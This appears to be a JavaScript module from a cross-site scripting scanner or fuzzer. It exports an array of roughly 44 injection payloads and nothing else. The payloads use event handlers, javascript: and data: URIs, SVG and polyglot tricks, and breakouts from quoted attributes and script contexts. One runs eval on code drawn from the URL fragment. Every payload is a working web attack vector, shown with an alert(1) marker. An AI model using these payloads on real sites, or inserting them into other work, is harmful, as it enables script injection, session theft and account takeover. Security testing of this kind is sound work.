export const PAYLOADS = [
  `alert(1)`,
  `0;alert(1)`,
  `alert\`1\``,
  `<script>alert(1)</script>`,
  `">'/><iMg sRc=X oNeRRor=alert(1)>`,
  `<svg onload=alert(1)>`,
  `"><svg onload=alert(1)//`,
  `"autofocus/onfocus=alert(1)//`,
  `<script>alert(1)//`,
  `'-alert(1)-'`,
  `'-alert(1)//`,
  `"-alert(1)//`,
  `</script><svg onload=alert(1)>`,
  `<script>alert(1)<!–`,
  `'onload=alert(1)><svg/1='`,
  `'>alert(1)</script><script/1='`,
  `*/alert(1)</script><script>/*`,
  `*/alert(1)">'onload="/*<svg/1='`,
  `\`-alert(1)">'onload="\`<svg/1='`,
  `*/</script>'>alert(1)/*<script/1='`,
  `<script src=javascript:alert(1)>`,
  `<embed src=javascript:alert(1)>`,
  `<a href=javascript:alert(1)>click`,
  `<math><brute href=javascript:alert(1)>click`,
  `<object data=javascript:alert(1)>`,
  `<svg><script xlink:href=data:,alert(1) />`,
  `<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>`,
  `"><img src=1 onerror=alert(1)>.gif`,
  `<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>`,
  `GIF89a/*<svg/onload=alert(1)>*/=alert(1)//;`,
  `<script src="data:&comma;alert(1)//`,
  `"><script src=data:&comma;alert(1)//`,
  `<link rel=import href="data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;`,
  `"><link rel=import href=data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;`,
  `<script/src="data:&comma;eval(atob(location.hash.slice(1)))//#alert(1)`,
  `<body onload=alert(1)>`,
  `<body onpageshow=alert(1)>`,
  `<body autofocus onfocus=alert(1)>`,
  `<marquee onstart=alert(1)>`,
  `<marquee loop=1 width=0 onfinish=alert(1)>`,
  `<audio src onloadstart=alert(1)>`,
  `<video onloadstart=alert(1)><source>`,
  `<input autofocus onblur=alert(1)>`,
  `<keygen autofocus onfocus=alert(1)>`,
]
